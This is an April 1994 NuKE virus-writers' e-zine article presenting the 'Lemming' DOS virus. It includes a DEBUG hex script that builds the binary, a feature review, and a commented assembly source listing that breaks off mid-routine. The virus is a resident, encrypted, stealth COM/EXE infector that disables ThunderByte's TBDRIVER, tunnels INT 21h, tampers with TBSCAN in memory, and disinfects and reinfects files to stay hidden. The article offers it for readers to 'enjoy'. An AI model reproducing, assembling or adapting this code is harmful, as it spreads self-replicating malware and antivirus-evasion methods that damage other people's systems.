Copy Link
Add to Bookmark
Report
NuKE Issue 08-004
-----BEGIN PGP SIGNED MESSAGE-----
NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_N
uK Nu
KE uK
E_ "The Lemming Virus" KE
_N `Virus of the Year' E_
Nu _N
uK Nu
KE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuKE_NuK
NuKE Info-Journal #8
April 1994
NuKE would like to present to you, one of the greatest virus seen this year.
This little beast is called the "Lemming" virus. And its mission is against
ThunderByte AntiVirus.
This virus when loaded into memory, will wait and look for the execution of
TBAV,TBSCAN and other antivirus products. During the passed year we have
heard about TBAVs 'amazing' methods to combat stealth viruses. These methods
aren't so amazing, simply stupid and darn dangerous. Remember the TBCLEAN
'heuristic' cleaning methods? We designed Varicella to escape that loop,
explained in NuKE IJ #7.
The Lemming virus combats TBSCAN's scanning methods, basically remember how
TBAV 'raved' that it uses it own internal file accessing unit, rather than
DOS? Remember how they raved that NO STEALTH virus could bypass it and fool
it with 'disinfection' on the fly? Well guess what this little beast does?
If you haven't put it together, the lemming virus will go resident and on
the execution of TBAV it will fool the TBSCAN program of TBAV in that TBSCAN
will 'think' it is using its 'internal file accessing' system, where in
reality it is using the DOS Interrupts 21h to open and close files. From
which that point the Lemming virus will use its 'disinfection' routines and
disinfect opened files, and reinfect them on closing. It uses simply methods
seen before to disinfect and reinfect.
Nonetheless, TBAV (naturally) never finds any infections, and never will!
This virus comes from a somewhat 'anonymous' person from Australia. The
message of;
"The Rise and Fall of ThunderByte-1994-Australia."
"You Will Never Trust Anti-Virus Software Again!!"
can be seen inside the virus.
I don't believe any of you have this virus. Unless you have spoken to Mr.
John 'Loud-Mouth' Buchanan, whom will tell you he had the virus long before
the author even compiled it.
Anyhow enjoy it, and expect only the best from NuKE to you.
===========================================================================
=====
N LEMMING.COM
E 0100 E9 2D 00 B4 09 CD 21 B8 00 4C CD 21 4C 65 6D 6D
E 0110 69 6E 67 20 76 65 72 73 69 6F 6E 20 2E 39 39 20
E 0120 62 65 74 61 20 73 61 6D 70 6C 65 07 07 0A 0D 24
E 0130 B9 F7 07 BE 18 01 E8 00 00 5D 81 ED 09 01 2E 80
E 0140 32 00 E3 04 49 46 EB F6 06 1E 0E 1F E8 DE 07 74
E 0150 0A B8 FE FF CD 21 83 FB FF 75 1A E9 90 00 E8 F8
E 0160 01 BF 00 01 0E 1F 8D B6 00 01 B9 70 08 F3 A4 E8
E 0170 0F 02 EB 7A 90 1E 06 E8 CA 00 07 1F B8 02 58 CD
E 0180 21 72 3C B8 03 58 BB 01 00 CD 21 72 32 06 5A 4A
E 0190 BF 03 00 8E C2 26 80 7D FD 5A 74 0D 26 03 15 42
E 01A0 8E C2 26 80 7D FD 5A 75 EA B8 03 58 33 DB CD 21
E 01B0 26 81 3D 0E 01 77 05 0E 07 EB 04 90 42 8E C2 06
E 01C0 33 FF 06 5A 4A 8E C2 26 80 3D 5A 75 21 B8 E0 10
E 01D0 B1 04 D3 E8 40 40 26 29 45 03 26 8B 45 03 59 03
E 01E0 C8 83 E9 10 2E 89 8E 52 09 8E C1 E9 70 FF 1F 07
E 01F0 8D BE 58 09 B8 4D 5A 2E 39 05 75 25 2E 8B 45 16
E 0200 06 5B 83 C3 10 03 C3 2E 8B 4D 0E 2E 8B 55 10 03
E 0210 CB FA 8E D1 8B E2 FB 50 2E 8B 5D 14 53 E8 15 00
E 0220 CB FC 8D B6 58 09 BF 00 01 B9 18 00 F3 A4 68 00
E 0230 01 E8 01 00 C3 33 C0 33 DB 33 C9 33 D2 33 F6 33
E 0240 FF 33 ED C3 B8 00 52 CD 21 83 C3 22 FC 26 C5 37
E 0250 83 FE FF 74 37 1E 0E 07 8D BE 5D 02 56 83 C6 0A
E 0260 B9 05 00 F3 A6 5B 07 75 E3 1E 07 0E 1F 8B FB 33
E 0270 C0 8D B6 62 02 40 B9 05 00 56 F3 A6 5E 74 07 3D
E 0280 84 27 74 08 EB EF 26 C7 45 F4 90 90 C3 54 42 44
E 0290 52 56 FA 9C FC 53 50 0D 0A 54 68 65 20 52 69 73
E 02A0 65 20 61 6E 64 20 46 61 6C 6C 20 6F 66 20 54 68
E 02B0 75 6E 64 65 72 42 79 74 65 2D 31 39 39 34 2D 41
E 02C0 75 73 74 72 61 6C 69 61 2E 0D 0A 59 6F 75 20 57
E 02D0 69 6C 6C 20 4E 65 76 65 72 20 54 72 75 73 74 20
E 02E0 41 6E 74 69 2D 56 69 72 75 73 20 53 6F 66 74 77
E 02F0 61 72 65 20 41 67 61 69 6E 21 21 0D 0A 5B 4C 45
E 0300 4D 4D 49 4E 47 5D 20 76 65 72 20 2E 39 39 E1 06
E 0310 1E 56 57 50 53 51 52 53 BE CD 03 BB 21 03 2E C6
E 0320 06 C1 03 00 E8 07 02 5B 73 1E 0E 1F E8 40 05 26
E 0330 C4 7F 02 57 33 DB 26 8A 1D FE C3 03 FB BE 25 03
E 0340 FC A5 A5 5F 26 80 05 03 5A 59 5B 58 5F 5E 1F 07
E 0350 C3 00 06 06 00 20 63 6F 0D 06 1E 33 DB 8E DB 8B
E 0360 1E 84 00 8E 06 86 00 1F 2E 89 9E 4E 09 2E 8C 86
E 0370 50 09 2E 89 9E 4A 09 2E 8C 86 4C 09 E8 58 04 07
E 0380 C3 06 33 C0 8E D8 B8 7F 04 2E 8B 9E 52 09 FA 89
E 0390 1E 86 00 A3 84 00 FB 07 C3 1E 52 B9 FF 00 B0 2E
E 03A0 1E 07 52 5F 2E 80 3E C1 03 01 74 03 FC F2 AE 33
E 03B0 C0 33 C9 0E 1F FE C0 50 57 56 D7 0A C0 74 2A 2E
E 03C0 80 3E C0 03 01 74 11 83 EF 08 2E 80 3E C1 03 01
E 03D0 74 06 83 C7 08 2B F8 4F 8A C8 F3 A6 74 07 5E 03
E 03E0 F0 5F 58 EB D0 F8 EB 02 90 F9 58 58 58 5A 1F C3
E 03F0 00 01 04 04 06 03 05 05 00 54 42 41 56 54 42 53
E 0400 43 41 4E 4E 41 56 56 53 41 46 45 46 50 52 4F 54
E 0410 04 03 03 03 03 00 43 4F 4D 63 6F 6D 45 58 45 65
E 0420 78 65 9C 0E E8 4D 02 84 C0 75 3F 50 53 06 B4 51
E 0430 CD 21 8E C3 26 3B 1E 16 00 75 2C 8B DA 8A 07 50
E 0440 B4 2F CD 21 58 FE C0 75 03 83 C3 07 26 8B 47 17
E 0450 25 1E 00 34 1E 75 10 26 80 67 17 E0 26 81 6F 1D
E 0460 70 08 26 83 5F 1F 00 07 5B 58 CF 2E C6 06 41 09
E 0470 00 EB 33 90 9C 0E E8 FB 01 72 F0 2E C6 06 41 09
E 0480 01 50 53 06 B4 2F CD 21 26 8B 47 16 26 8B 4F 18
E 0490 25 1E 00 35 1E 00 75 0B 26 81 6F 1A 70 08 26 83
E 04A0 5F 1C 00 07 5B 58 CA 02 00 E9 76 FF B0 03 CF 80
E 04B0 FC 11 74 F5 80 FC 12 74 F0 80 FC 4E 74 B6 80 FC
E 04C0 4F 74 B1 80 FC 4B 74 2A 80 FC 6C 74 22 80 FC 3D
E 04D0 74 1D 80 FC 3E 74 68 80 FC 4C 74 0E 3D FE FF 75
E 04E0 04 BB FF FF CF 2E FF 2E 4E 09 E8 6A 03 EB F6 E9
E 04F0 88 01 E8 1A FE EB 49 90 53 B8 20 12 CD 2F B8 16
E 0500 12 26 8A 1D CD 2F 5B 83 C7 11 26 C6 45 F1 02 83
E 0510 C7 17 57 5A 06 1F C3 BB E0 03 BE E6 03 2E C6 06
E 0520 C0 03 01 E8 73 FE 72 13 BB C2 03 BE C9 03 2E C6
E 0530 06 C0 03 00 E8 62 FE 73 02 F8 C3 F9 C3 E9 B2 00
E 0540 80 FB 04 77 08 80 FC 4B 74 03 E9 27 01 50 53 06
E 0550 53 51 52 1E 57 56 E8 4A 02 80 FC 4B 75 20 E8 37
E 0560 02 72 DA 80 FB 05 72 D5 2E C6 06 49 06 01 53 2E
E 0570 C6 06 C1 03 00 E8 9F FF 5B 73 1C E9 DD 00 2E C6
E 0580 06 49 06 00 E8 71 FF 53 2E C6 06 C1 03 01 E8 86
E 0590 FF 5B 73 03 E9 C4 00 E8 7C 01 52 51 2E 89 16 54
E 05A0 09 2E 89 0E 56 09 E8 7B 01 72 03 E9 A8 00 E8 7D
E 05B0 01 0E 1F BA 28 09 B9 18 00 E8 86 01 51 FC 0E 07
E 05C0 BE 28 09 BF 58 09 B9 18 00 F3 A4 59 2E 83 3E 64
E 05D0 09 01 72 1E 33 D2 E8 60 01 83 FA 00 77 05 3D 10
E 05E0 EF 77 0F 83 FA 04 77 0A 80 3E 28 09 4D 74 06 EB
E 05F0 46 90 EB 62 90 53 B1 04 8B 1E 30 09 D3 E3 52 50
E 0600 2B C3 83 DA 00 BB 10 00 F7 F3 89 16 3C 09 A3 3E
E 0610 09 05 87 00 A3 36 09 58 5A 05 70 08 83 D2 00 BB
E 0620 00 02 F7 F3 5B 40 A3 2C 09 89 16 2A 09 B9 18 00
E 0630 BA 28 09 52 51 EB 0F 2D 03 00 2E A3 FC 06 B9 03
E 0640 00 BA FB 06 52 51 E8 05 01 E8 E2 00 59 5A E8 F7
E 0650 00 59 80 C9 1E 51 59 5A E8 C2 00 2E 80 3E 49 06
E 0660 01 75 05 B4 3E E8 29 01 E8 60 01 5E 5F 1F 5A 59
E 0670 5B 07 5B 58 2E FF 2E 4E 09 00 60 1E 06 80 FC 6C
E 0680 75 02 56 5A 2E C6 06 C1 03 00 E8 8A FE 72 6B E8
E 0690 11 01 E8 03 01 72 63 0E 1F E8 7A 00 E8 85 00 75
E 06A0 51 33 D2 E8 93 00 52 50 2D 1C 00 83 DA 00 8B CA
E 06B0 8B D0 E8 7D 00 BA 54 09 B9 1C 00 E8 84 00 E8 6D
E 06C0 00 B9 18 00 BA 58 09 E8 7E 00 5A 59 81 EA 70 08
E 06D0 83 D9 00 E8 5C 00 B4 40 33 C9 E8 B4 00 8B 0E 56
E 06E0 09 8B 16 54 09 E8 35 00 80 3E 41 09 00 74 03 E8
E 06F0 10 00 B4 3E E8 9A 00 E8 D1 00 07 1F 61 2E FF 2E
E 0700 4E 09 50 53 06 B4 2F E8 87 00 2E A1 56 09 26 89
E 0710 47 16 07 5B 58 C3 B8 00 57 E8 75 00 C3 B8 01 57
E 0720 E8 6E 00 C3 80 E1 1E 80 F9 1E C3 E9 2D 00 33 C9
E 0730 33 D2 B8 00 42 E8 59 00 C3 33 C9 B8 02 42 E8 50
E 0740 00 C3 B4 3F E8 4A 00 C3 B4 40 E8 44 00 C3 33 C0
E 0750 E6 70 E5 70 80 FC 00 75 02 B4 0C 80 FC 21 75 02
E 0760 B4 15 2E 88 26 11 01 BE 00 01 BF 70 09 47 B9 70
E 0770 08 FC F3 A4 B9 F7 07 BE 70 09 46 83 C6 18 90 30
E 0780 24 46 E2 FB B4 40 B9 70 08 BA 70 09 42 E8 01 00
E 0790 C3 9C 2E FF 1E 4A 09 C3 50 B8 02 3D E8 F2 FF 50
E 07A0 5B 58 C3 50 53 52 06 1E 0E 1F B8 24 35 E8 E1 FF
E 07B0 8C 06 99 07 89 1E 97 07 BA 7C 04 B8 24 25 E8 D0
E 07C0 FF 1F 07 5A 5B 58 C3 56 01 3D 16 B8 24 25 2E C5
E 07D0 16 97 07 E8 BB FF C3 B8 01 35 CD 21 8C C7 8B F3
E 07E0 B8 01 25 8D 96 F0 07 CD 21 9C 0E 8D 86 DF 07 50
E 07F0 FA 9C 58 0D 00 01 50 2E 8B 86 50 09 50 2E 8B 86
E 0800 4E 09 50 B8 1C 35 2E C6 86 41 09 01 8B DD CF 2E
E 0810 C6 86 41 09 00 FB B8 01 25 8B D6 8E DF CD 21 C3
E 0820 55 8B DD 8B EC 2E 80 BF 41 09 01 74 0D 81 66 06
E 0830 FF FE 2E C6 87 41 09 00 5D CF 81 7E 04 00 03 72
E 0840 02 5D CF 51 8B 4E 02 2E 89 8F 4A 09 8B 4E 04 2E
E 0850 89 8F 4C 09 59 EB D6 2E 80 3E 40 09 00 74 0F 2E
E 0860 C6 06 40 09 00 2E C6 06 FC 08 00 E8 3E 00 C3 60
E 0870 06 1E B8 1C 35 E8 19 FF 89 1E 46 09 8C C3 89 1E
E 0880 48 09 BA 64 08 B4 25 E8 07 FF C6 06 40 09 01 90
E 0890 1F 07 61 C3 2E 80 3E FC 08 01 74 0B 2E 80 3E 40
E 08A0 09 01 75 03 E8 33 00 2E FF 2E 46 09 60 06 1E 0E
E 08B0 58 33 DB 8E C3 06 26 8B 1E 72 00 8E C3 3B D8 75
E 08C0 15 2E A1 48 09 2E 8B 1E 46 09 07 FA 26 A3 72 00
E 08D0 26 89 1E 70 00 FB 1F 07 61 C3 60 06 1E 0E 58 33
E 08E0 DB 8E C3 26 8B 1E 72 00 26 8B 3E 70 00 8E C3 3B
E 08F0 D8 74 2D 33 C0 BE F4 08 0E 1F 40 B9 08 00 56 F3
E 0900 A6 5E 74 07 3D FE FF 74 17 EB EF 06 1F 83 EF 08
E 0910 8B F7 83 C6 04 B9 03 00 F3 A4 2E C6 06 FC 08 01
E 0920 1F 07 61 C3 44 4F 53 00 4F 57 4E 00 00 9C 58 50
E 0930 25 FF 0F 50 9D 9C 58 5B 25 00 F0 3D 00 F0 C3 6D
E 0940 21 50 61 63 6B 65 64 20 66 69 6C 65 20 69 73 20
E 0950 63 6F 72 72 75 70 74 9C BA 0C 01 B4 09 CD 21 B8
E 0960 00 4C CD 21 4C 65 6D 6D 69 6E 67 20 76 65 72 73
E 0970 00 00 00 00 00 00 53 FF 00 F0 9F 10 16 01 9E 10
E 0980 16 01 E0 9E 16 1B 14 26 BA 0C 01 B4 09 CD 21 B8
E 0990 00 4C CD 21 4C 65 6D 6D 69 6E 67 20 76 65 72 73
RCX
08A0
W
Q
===========================================================================
=====
Review of the [LEMMING] virus descovered in Australia.
The dictionary definition of the word Lemming is a small rodent noted
for it's mass migration in periods of population increase. Although
this virus is not tiny, approx 2160 bytes in length, it has the ability
to spread quickly since it is a fast infector and a full stealth virus
capable of remaining invisible to the user. Below are listed it's
features:
1. It's encryption algorythm, although un-orthodox, cannot be
detected by Thunderbyte on full heuristic scan.
2. Since the virus uses 80286+ instructions, It checks
the processor type before installing. If the 8086 is present it
will not become resident but will hand control over to the
infected program.
3. This virus has the ability to reside in the UMB area or
just below the 640k boundry and it tests for the presence of
UMB's by calling INT 21 ax=5802 and INT 21 ax=5803. It will
reside below the 640k boundry if there isn't enough UMB memory.
It becomes resident by altering the MCB and subtracting the
memory it needs from the MCB. After which it copies itself to the
newly allocated memory and hooks the interrupts it needs. Lemming
will then hand control over to the host program, but before it
does that, it will zero all used register, which is quite
uncommon in many viruses.
4. The virus will then check for the presence of TBDRIVER, and
if found will patch it against the detection of tunneling. In
the process of patching TBDRIVER, it disables it from
functioning properly, even though the other TBAV utilities
still recognize it's presence. It will then tunnel to find the
original entry point to dos which it will call every time it
needs to use a dos function, bypassing any memory resident
anti-virus programs.
5. Once resident, any anti-virus utility that relies upon
checksums will be rendered useless. This baby uses full directory
stealth and disinfects files when opened with INT 21 ah=3d,
ah=6c. In addition, if it detects the execution of Tbscan, it
will add to the command line the 'co' parameter which forces
Tbscan into compatibility mode. It does this by detecting the
execution of TBSCAN and then modifying the command line before it
is read by TBSCAN. To overcome the problem of Tbscan showing that
it is using the 'DOS' file system, Lemming will then patch Tbscan
so that its 'OWN' file system appears to be used. Lemming does
this by detecting the execution of TBSCAN and hooking the timer
interrupt. It then traces into code of TBSCAN through the hooked
interrupt, searches for the string 'DOS OWN'. Once found, Lemming
then replaces the 'DOS' string with 'OWN' so that the string in
memory now looks like this-> 'OWN OWN'. When TBSCAN has finished
it's thing, Lemming unhooks the timer interrupt and things
continue as normal.
6. During a disinfection, Lemming will change the current DTA
seconds field to the files original seconds. This overcomes the
AV's use of the DTA for checksums.
7. It uses one routine for disinfection of com and exe's and the
same infection routine for both as well. This cuts down the size
of the infection routines and makes room for the stealth code.
Lemming will not infect an exe file if the maximum and minimum
number of paragraphs required by the program are both zero. Why
you may ask? I don't know the answer to that one.
8. If an infected file is viewed by a text/hex editor the string
'Packed file is corrupt' appears at the end of the infected file
even if the file isn't packed. The presence of the string would
fool most into thinking that the file is clean.
The virus appears to have no trigger or payload and is invisible on
most systems. Below is a commented disassembly of the virus and should
assemble with TASM 3.0. Enjoy!!
- --------------------------------CUT HERE-----------------------------------
.286
.model tiny
.code
virus_size equ vir_end - start
virus_siz equ virus_size + virus_size
decrypt_size equ handle - next_function
data_size equ vir_end - step1
engine_size equ next_function - start
Int21_base equ 021h*4
timer_seg equ 01ch*4+2
virus_paragraphs equ virus_size * 2/16
code segment
assume cs:code,ds:code,es:code
progr equ 0100h
org progr
main:
start:
mov cx,decrypt_size
lea si,next_function
call ofset
ofset: pop bp
sub bp,109h ;Set postion of base pointer
decrypt:
xor byte ptr cs:[si][bp],00 ;Anti heuristic decryptor
key: ;will fool Thunderbyte.
jcxz next_function
dec cx
inc si
jmp decrypt
fooled_tbav:
next_function:
push es
push ds
push cs
pop ds
call getcpu ;Detect CPU
je _8086
mov ax,0fffeh ;Determine if installed
int 21h
cmp bx,0ffffh ;Returns ffff in bx if so...
test_processor:
jne install__
_8086: jmp end_install ;Not 80286 compatible
transfer:
call get_int21
mov di,0100h
push cs
pop ds
lea si,word ptr cs:start[bp]
mov cx,virus_size
move:
rep movsb ;Move virus and make resident
copied:
call set_int21 ;Set int 21 to virus
jmp end_install
install__ proc near
push ds es
call anti_av ;Detect the presence of TBDRIVER
pop es ds ;and patch
mov ax,5802h ;are umb's available?
int 21h
jc install_low ;no then install in low memory
mov ax,5803h ;Chain mcb's into low memory
mov bx,1
int 21h
jc install_low
push es ;get current mcb
pop dx
dec dx
mov di,3 ;add to current mcb to get
;pointer to next mcb
walk: mov es,dx
cmp byte ptr es:[di-3],05ah
je lastmcb
add dx,word ptr es:di
inc dx ;search for last mcb.
mov es,dx
cmp byte ptr es:[di-3],05ah
jne walk
lastmcb:
mov ax,5803h ;remove umb link
xor bx,bx
int 21h
cmp word ptr es:[di],virus_paragraphs
ja hi_install ;Enough memory for UMB install?
push cs
pop es
jmp install_low
hi_install:
inc dx
mov es,dx ;es points to virus new CS
install_low:
push es
xor di,di
push es ;original psp segment
pop dx
dec dx
mov es,dx
cmp byte ptr es:[di],5ah
jne end_install
mov ax,virus_siz
mov cl,4
shr ax,cl
inc ax
inc ax
sub word ptr es:[di+3],ax ;
mov ax,word ptr es:[di+3] ;copy last mcb size into ax
pop cx
add cx,ax ;new segment
sub cx,10h
mov word ptr cs:new_seg[bp],cx
mov es,cx
jmp transfer ;go and move virus to new
;memory position
install__ endp
end_install:
pop ds
pop es
lea di,word ptr cs:buffer1[bp]
mov ax,05a4dh
cmp word ptr cs:[di],ax
jne goto_com
mov ax,word ptr cs:[di+16h]
push es
pop bx
add bx,10h
add ax,bx ;code segment
mov cx,word ptr cs:[di+0eh] ;get original ss
mov dx,word ptr cs:[di+10h] ;get original sp
add cx,bx
cli
mov ss,cx ;restore original ss and sp
mov sp,dx
sti
push ax
mov bx,word ptr cs:[di+14h] ;get original ip
push bx
call clear_reg ;clear all registers
retf ;and hand back control
goto_com:
cld
lea si,buffer1[bp] ;restore com entry point
mov di,0100h
mov cx,18h
rep movsb
push 0100h
call clear_reg
ret ;hand back control
clear_reg:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp
ret
anti_av proc near
; DISABLE TBDRIVER AGAINST TUNNELING DETECT
mov ax,5200h
int 21h ;es:bx
add bx,22h ;pointer to first device 'NUL'
;or 'CON'
next_search:
cld
lds si,word ptr es:bx
cmp si,-1
je not_found
push ds cs
pop es
lea di,scan[bp]
push si
add si,10 ;device name offset
;from bx pointer
mov cx,5
rep cmpsb ;search for device name
pop bx es
jne next_search
found: ;If TBDRIVER is found then
push ds ;patch against tunneling
pop es
push cs
pop ds
mov di,bx
xor ax,ax
lea si,scan_string[bp]
next_char:
inc ax
mov cx,5
push si
rep cmpsb ;search for string
pop si
je bullseye
cmp ax,10116
je not_found
jmp next_char
bullseye:
mov es:[di-12],09090h ;disable tbdriver
not_found:
ret
scan db 'TBDRV'
scan_string db 0fah,09ch,0fch,053h,050h
anti_av endp
VirName db 0dh,0ah,'The Rise and Fall of ThunderByte-1994-Australia.',0dh,0ah
db ' You Will Never Trust Anti-Virus Software Again!! ',0dh,0ah
db '[LEMMING] ver .99á'
Anti_tbscan proc near
push es ds si di ax bx cx dx
push bx
lea si,Tbscan
lea bx,tbscan_size
mov byte ptr cs:no_scasb_flag,0
call tbscan_test ;Is Tbscan being executed?
pop bx
jnc not_tbscan
push cs
pop ds
call hook_int1c ;
les di, dword ptr es:bx+2
push di
xor bx,bx
mov bl, byte ptr es:[di]
add di,bx ;di now points to end of C/T
lea si,tbscan_switch
cld
movsw
movsw
pop di
add byte ptr es:[di],3
not_tbscan:
pop dx cx bx ax di si ds es
ret
tbscan_size db 0,6,6,0
tbscan_switch db 20h,'c','o',0dh ;adding ' co' to command line
;forces tbscan into Compat
;mode
Anti_tbscan endp
get_int21 proc near
push es
push ds
xor bx,bx
mov ds,bx
mov bx,word ptr ds:[84h]
mov es,word ptr ds:[86h]
pop ds
mov word ptr cs:int_21_off[bp],bx ;save vector for later calls
mov word ptr cs:int_21_seg[bp], es
mov word ptr cs:int_21_off_o[bp],bx
mov word ptr cs:int_21_seg_o[bp],es
call int_trace
pop es
ret
get_int21 endp
set_int21 proc near
push es
xor ax,ax
mov ds,ax
lea ax,word ptr cs:int_21
mov bx,word ptr cs:new_seg[bp]
cli
mov ds:[134],bx
mov ds:[132],ax
sti
pop es
ret
set_int21 endp
identify proc near
;on entry, ds:dx points to asciiz file to be run.
;bx must point to file size table. EOT must be '0'
;si must point to table of strings to compare.
;direction_flag==0 for before '. e.g lemming.com' and 1 for after.
push ds ;pointers to asciiz
push dx
mov cx,00ffh
mov al,'.'
push ds
pop es
push dx
pop di
cmp byte ptr cs:no_scasb_flag,1
je no_scasb
cld
repne scasb
no_scasb:
xor ax,ax ;load index position (0).
xor cx,cx
push cs
pop ds
next_byte:
inc al
push ax
push di ;save position
push si
xlat
or al,al ;end of index?
jz no_match ;yes?
cmp byte ptr cs:direction_flag,1
je right
sub di,8 ;back up to begining of name
cmp byte ptr cs:no_scasb_flag,1
je right
add di,8
sub di,ax
dec di
right: mov cl,al ;bytes to count...
rep cmpsb
je match_found
pop si
add si,ax ;if not equal, next field
pop di
pop ax
jmp next_byte
match_found:
clc
jmp clear
no_match: stc
clear: pop ax
pop ax
pop ax
pop dx
pop ds
ret
direction_flag db 0
no_scasb_flag db 0
identify endp
do_not_infect proc near ;Table of files not to infect
start_:
AVSize db 4,4,6,3,5,5,0
AVName :db 'TBAV'
TBSCAN: db 'TBSCAN'
db 'NAV'
db 'VSAFE'
db 'FPROT'
do_not_infect endp
is_file_infectable proc near
extension_size db 4,3,3,3,3,0 ;Table of extensions to infect
extension: db 'COM'
db 'com'
db 'EXE'
db 'exe'
stop_:
is_file_infectable endp
stealth_a proc near ;Appears to be the same DIR
pushf ;stealth routines from NPOX
push cs
call skip_infect
test al,al
jnz no
push ax
push bx
push es
mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz fcb_ok
add bx,7h
fcb_ok: mov ax,es:[bx+17h]
and ax,01eh
xor al,01eh
jnz not_
and byte ptr es:[bx+17h],0e0h
sub word ptr es:[bx+1dh],virus_size
sbb word ptr es:[bx+1fh],0
not_: pop es
pop bx
pop ax
no: iret
stealth_a endp
search_flag_b:
mov byte ptr cs:trace_flag,0 ;re-use to save memory
jmp dta_out
stealth_b proc near
pushf
push cs
call skip_infect
jc search_flag_b
mov byte ptr cs:trace_flag,1
push ax
push bx
push es
mov ah,2fh
int 21h
mov ax,es:[bx+16h]
mov cx,es:[bx+18h]
and ax,1eh
xor ax,1eh
jnz dta_out1
sub word ptr es:[bx+1ah],virus_size
sbb word ptr es:[bx+1ch],0
dta_out1: pop es
pop bx
pop ax
dta_out: retf 0002h
stealth_b endp
stealth: jmp stealth_a
critical_error_handler:
mov al,03h
iret
int_21 proc near
cmp ah,011h
je stealth
cmp ah,012h
je stealth
cmp ah,04eh
je stealth_b
cmp ah,04fh
je stealth_b
cmp ah,04bh
je file_infect_step
cmp ah,06ch
je disinfect_step
cmp ah,03dh
je disinfect_step
cmp ah,03eh
je file_infect
cmp ah,04ch
je program_terminate_step
cmp ax,0fffeh ;test if active in memory
jne direct
mov bx,0ffffh
iret
direct: jmp dword ptr cs:int_21_off
program_terminate_step:
call program_terminate
jmp direct
disinfect_step: jmp disinfect
file_infect_step:
call anti_tbscan
jmp file_infect
int_21 endp
get_filename_from_handle proc near
push bx
mov ax,1220h
int 2fh
mov ax,1216h
mov bl,es:[di]
int 2fh
pop bx
add di,11h
mov byte ptr es:[di-0fh],02
add di,17h
push di
pop dx
push es
pop ds
ret
get_filename_from_handle endp
infect_OK proc near
lea bx,extension_size
lea si,extension ;Test for EXE,COM,OVL
mov byte ptr cs:direction_flag,1
call identify
jc error ;if not exe then error
lea bx,avsize
lea si,avname ;Test for AV
tbscan_test:
mov byte ptr cs:direction_flag,0
call identify
jnc error ;If no AV then good!
no_error:
clc
ret
error: stc
ret
infect_ok endp
no_good:
jmp exe
file_infect proc
cmp bl,4
ja handle_ok
cmp ah,4bh ;determine if file open or
je handle_ok ;file execute
jmp skip_infect
handle_ok:
push ax
push bx
push es
push bx
push cx
push dx
push ds
push di
push si
call set_critical_error_handler
cmp ah,4bh
jne only_handle_supplied
call open_file ;open file if call = ah=4b
jc no_good
cmp bl,5
jb no_good
mov byte ptr cs:execute_flag,1
push bx
mov byte ptr cs:no_scasb_flag,0
call infect_ok
pop bx
jnc skip_flag_check
jmp dont_infect_here
only_handle_supplied:
mov byte ptr cs:execute_flag,0 ;if flag ==1 then close
call get_filename_from_handle
push bx
mov byte ptr cs:no_scasb_flag,1
call infect_ok
pop bx
jnc good
jmp dont_infect_here
skip_flag_check:
good: call get_date
push dx
push cx
mov word ptr cs:old_date,dx
mov word ptr cs:old_time,cx
call is_file_infected
jc do_it
jmp loc_15
do_it: call set_offset_start
push cs
pop ds
lea dx,buffer
mov cx,18h
call read_file
push cx
cld
push cs
pop es
lea si,buffer
lea di,buffer1
mov cx,18h
rep movsb ;Save header for stealth
pop cx ;disinfect on open
cmp word ptr cs:[buffer1+0ch],1 ;Dont infect if number of
jb exe ;paragraps required after load
xor dx,dx ;is less than 1
call set_offset_e
cmp dx,0
ja big_enough
cmp ax,0fff0h-virus_siz
ja exe
big_enough:
cmp dx,4
ja exe
cmp byte ptr ds:[buffer],4Dh ; 'M' ; is file exe?
je file_is_exe ; Jump if equal;
jmp file_is_com
exe:
jmp loc_15
file_is_exe: ;Recalculate new EXE Header
push bx
mov cl,4
mov bx,word ptr [buffer+8]
shl bx,cl
push dx ax
sub ax,bx
sbb dx,0
mov bx,10h
div bx
mov word ptr [buffer+14h],dx
mov word ptr [buffer+16h],ax
add ax,virus_size/16
mov word ptr [buffer+0eh],ax
pop ax dx
add ax,virus_size
adc dx,0
mov bx,512
div bx
pop bx
inc ax
mov word ptr [buffer+4],ax
mov word ptr [buffer+2],dx
mov cx,18h
lea dx,buffer
push dx
push cx
jmp short loc_14
File_Is_Com:
sub ax,3
mov word ptr cs:[com_header_offset],ax
mov cx,3 ;header size in bytes
lea dx,com_header
push dx
push cx
loc_14:
call write_virus ;write and encrypt virus
call set_offset_start
pop cx
pop dx
call write_bytes
pop cx
or cl,01eh
push cx
loc_15:
pop cx
pop dx
call write_date
dont_infect_here:
cmp byte ptr cs:execute_flag,1
jne dont_close
mov ah,3eh
call dos
dont_close:
call restore_critical_error_handler
pop si
pop di
pop ds
pop dx
pop cx
pop bx
pop es
pop bx
pop ax
skip_infect:
jmp dword ptr cs:int_21_off
execute_flag db 0
file_infect endp
disinfect proc near
pusha
push ds es
cmp ah,06ch ;adjust ds:si to ds:dx if
jne not_extended ;ah == extended file open(6c)
push si
pop dx
not_extended:
mov byte ptr cs:no_scasb_flag,0
call infect_ok
jc skip_disinfect
call set_critical_error_handler
call open_file
jc skip_disinfect ;Skip disinfection on error
push cs
pop ds
call get_date ;Get file date
call is_file_infected ;Is the seconds field 60?
jne dont_disinfect ;If not, then quit
xor dx,dx
call set_offset_e ;get infected file size
push dx ;save
push ax
sub ax,1ch ;sub buffer size from end
sbb dx,0
mov cx,dx ;set new pointer to buffer
mov dx,ax
call no_xor
lea dx,old_date
mov cx,1ch ;buffer = 18h + 4 for date = 1c
call read_file ;read into buffer
call set_offset_start ;Restore original header
mov cx,18h
lea dx,buffer1
call write_bytes ;write at start
pop dx
pop cx
sub dx,virus_size
sbb cx,0
call no_xor ;set offset from start
mov ah,40h
xor cx,cx
call dos ;truncate
mov cx,old_time
mov dx,old_date
call write_date ;Restore original date and time
cmp trace_flag,0
je dont_disinfect
call reset_dta ;Adjust seconds field in DTA
dont_disinfect:
mov ah,3eh ;Close file
call dos
call restore_critical_error_handler
skip_disinfect:
pop es ds
popa
jmp dword ptr cs:int_21_off
disinfect endp
reset_dta proc near
push ax bx es
mov ah,2fh ;Get current DTA
call dos ;DTA pointed to by es:bx
mov ax,word ptr cs:old_time ;Get old time and
mov word ptr es:[bx+16h],ax ;save in DTA
pop es bx ax
ret
reset_dta endp
get_date proc near
mov ax,5700h
call dos
ret
get_date endp
write_date proc near
mov ax,5701h
call dos
ret
write_date endp
is_file_infected proc near
and cl,01eh ;Unmask seconds
cmp cl,01eh
ret
